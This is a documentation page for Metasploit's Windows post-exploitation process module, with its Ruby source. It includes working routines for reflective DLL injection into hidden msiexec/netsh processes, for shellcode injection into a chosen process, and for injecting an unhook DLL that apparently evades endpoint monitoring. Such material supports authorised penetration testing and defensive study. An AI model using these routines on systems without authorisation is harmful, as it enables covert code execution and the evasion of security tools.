Module: Msf::Post::Windows::Process

Includes:: Process, ReflectiveDLLInjection

Defined in:: lib/msf/core/post/windows/process.rb

Constant Summary

Constants included from ReflectiveDLLInjection

ReflectiveDLLInjection::PAGE_ALIGN

Constants included from ReflectiveDLLLoader

ReflectiveDLLLoader::EXPORT_REFLECTIVELOADER

Instance Method Summary collapse

#arch_check(test_arch, pid) ⇒ Object

Checks the architecture of a payload and PID are compatible Returns true if they are false if they are not.
#execute_dll(rdll_path, param = nil, pid = nil) ⇒ Object

Injects a reflective DLL into a process, and executes it.
#execute_shellcode(shellcode, base_addr = nil, pid = nil) ⇒ Boolean

Injects shellcode to a process, and executes it.
#get_notepad_pathname(bits, windir, client_arch) ⇒ Object

returns the path to the notepad process based on syswow extension.
#initialize(info = {}) ⇒ Object
#inject_unhook(proc, bits, delay_sec) ⇒ Object

Instance Method Details

#arch_check(test_arch, pid) ⇒ `Object`

Checks the architecture of a payload and PID are compatible Returns true if they are false if they are not

# File 'lib/msf/core/post/windows/process.rb', line 39

def arch_check(test_arch, pid)
  # get the pid arch
  client.sys.process.processes.each do |p|
    # Check Payload Arch
    if pid == p["pid"]
      return test_arch == p['arch']
    end
  end
end

#execute_dll(rdll_path, param = nil, pid = nil) ⇒ `Object`

Injects a reflective DLL into a process, and executes it.

Parameters:

rdll_path (String) —

The path to the DLL to inject
param (String, Integer, nil) (defaults to: nil) —

The parameter to pass to the DLL's entry point. If this value is a String then it will first be written into the process memory and then passed by reference. If the value is an Integer, then the value will be passed as is. If the value is nil, it'll be passed as a NULL pointer.
pid (Integer) (defaults to: nil) —

The process ID to inject to, if unspecified, a new instance of a random EXE from the process_list array will be launched to host the injected DLL.

# File 'lib/msf/core/post/windows/process.rb', line 72

def execute_dll(rdll_path, param=nil, pid=nil)
  process_list = ['msiexec', 'netsh']
  if pid.nil?
    # Get a random process from the process list to spawn.
    process_cmd = process_list.sample

    # Use Rex's PeParsey as per Spencer's suggestion to determine the true architecture of the DLL we are injecting.
    pe = Rex::PeParsey::Pe.new_from_file(rdll_path, true)
    arch = pe.hdr.file['Machine'].value

    # If the DLL is x86 but the host architecture is x64, then launch a 32 bit WoW64 binary to inject into.
    if (arch == Rex::PeParsey::PeBase::IMAGE_FILE_MACHINE_I386) && (session.sys.config.sysinfo['Architecture'] == ARCH_X64)
      windir = session.sys.config.getenv('windir')
      process_cmd = "#{windir}\\SysWOW64\\#{process_cmd}.exe"
    end
    print_status("Launching #{process_cmd} to host the DLL...")
    host_process = client.sys.process.execute(process_cmd, nil, { 'Hidden' => true })
    begin
      process = client.sys.process.open(host_process.pid, PROCESS_ALL_ACCESS)
      print_good("Process #{process.pid} launched.")
    rescue Rex::Post::Meterpreter::RequestError
      # Reader Sandbox won't allow to create a new process:
      # stdapi_sys_process_execute: Operation failed: Access is denied.
      print_error('Operation failed. Trying to inject into the current process...')
      process = client.sys.process.open
    end
  else
    process = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
  end
  print_status("Reflectively injecting the DLL into #{process.pid}...")
  exploit_mem, offset = inject_dll_into_process(process, ::File.expand_path(rdll_path))

  if param.is_a?(String)
    # if it's a string, treat it as data and copy it into the remote process then pass it by reference
    param_ptr = inject_into_process(process, param)
  elsif param.is_a?(Integer)
    param_ptr = param
  elsif param.nil?
    param_ptr = 0
  else
    raise TypeError, 'param must be a string, integer or nil'
  end

  process.thread.create(exploit_mem + offset, param_ptr)
end

#execute_shellcode(shellcode, base_addr = nil, pid = nil) ⇒ `Boolean`

Injects shellcode to a process, and executes it.

Parameters:

shellcode (String) —

The shellcode to execute
base_addr (Integer) (defaults to: nil) —

The base address to allocate memory
pid (Integer) (defaults to: nil) —

The process ID to inject to, if unspecified, the shellcode will be executed in place.

Returns:

(Boolean) —

True if successful, otherwise false

# File 'lib/msf/core/post/windows/process.rb', line 127

def execute_shellcode(shellcode, base_addr=nil, pid=nil)
  pid ||= session.sys.process.getpid
  host  = session.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
  if base_addr.nil?
    shell_addr = host.memory.allocate(shellcode.length)
  else
    shell_addr = host.memory.allocate(shellcode.length, nil, base_addr)
  end

  host.memory.protect(shell_addr)

  if host.memory.write(shell_addr, shellcode) < shellcode.length
    vprint_error("Failed to write shellcode")
    return false
  end

  vprint_status("Creating the thread to execute in 0x#{shell_addr.to_s(16)} (pid=#{pid.to_s})")
  thread = host.thread.create(shell_addr,0)
  unless thread.instance_of?(Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Thread)
    vprint_error("Unable to create thread")
    nil
  end
  thread
end

#get_notepad_pathname(bits, windir, client_arch) ⇒ `Object`

returns the path to the notepad process based on syswow extension

# File 'lib/msf/core/post/windows/process.rb', line 50

def get_notepad_pathname(bits, windir, client_arch)
  if bits == ARCH_X86 and client_arch == ARCH_X86
    cmd = "#{windir}\\System32\\notepad.exe"
  elsif bits == ARCH_X64 and client_arch == ARCH_X64
    cmd = "#{windir}\\System32\\notepad.exe"
  elsif bits == ARCH_X64 and client_arch == ARCH_X86
    cmd = "#{windir}\\Sysnative\\notepad.exe"
  elsif bits == ARCH_X86 and client_arch == ARCH_X64
    cmd = "#{windir}\\SysWOW64\\notepad.exe"
  end
  return cmd
end

#initialize(info = {}) ⇒ `Object`

# File 'lib/msf/core/post/windows/process.rb', line 13

def initialize(info = {})
  super(
    update_info(
      info,
      'Compat' => {
        'Meterpreter' => {
          'Commands' => %w[
            stdapi_sys_config_getenv
            stdapi_sys_config_sysinfo
            stdapi_sys_process_attach
            stdapi_sys_process_execute
            stdapi_sys_process_getpid
            stdapi_sys_process_get_processes
            stdapi_sys_process_memory_allocate
            stdapi_sys_process_memory_protect
            stdapi_sys_process_memory_write
            stdapi_sys_process_thread_create
          ]
        }
      }
    )
  )
end

#inject_unhook(proc, bits, delay_sec) ⇒ `Object`

# File 'lib/msf/core/post/windows/process.rb', line 152

def inject_unhook(proc, bits, delay_sec)
  if bits == ARCH_X64
    dll_file_name = 'x64.dll'
  elsif bits == ARCH_X86
    dll_file_name = 'x86.dll'
  else
    return false
  end
  dll_file = MetasploitPayloads.meterpreter_ext_path('unhook', dll_file_name)
  dll, offset = inject_dll_into_process(proc, dll_file)
  proc.thread.create(dll + offset, 0)
  Rex.sleep(delay_sec)
end

Module: Msf::Post::Windows::Process

Constant Summary

Constants included from ReflectiveDLLInjection

Constants included from ReflectiveDLLLoader

Instance Method Summary collapse

Methods included from Process

Methods included from File

Methods included from Common

Methods included from ReflectiveDLLInjection

Methods included from ReflectiveDLLLoader

Instance Method Details

#arch_check(test_arch, pid) ⇒ Object

#execute_dll(rdll_path, param = nil, pid = nil) ⇒ Object

#execute_shellcode(shellcode, base_addr = nil, pid = nil) ⇒ Boolean

#get_notepad_pathname(bits, windir, client_arch) ⇒ Object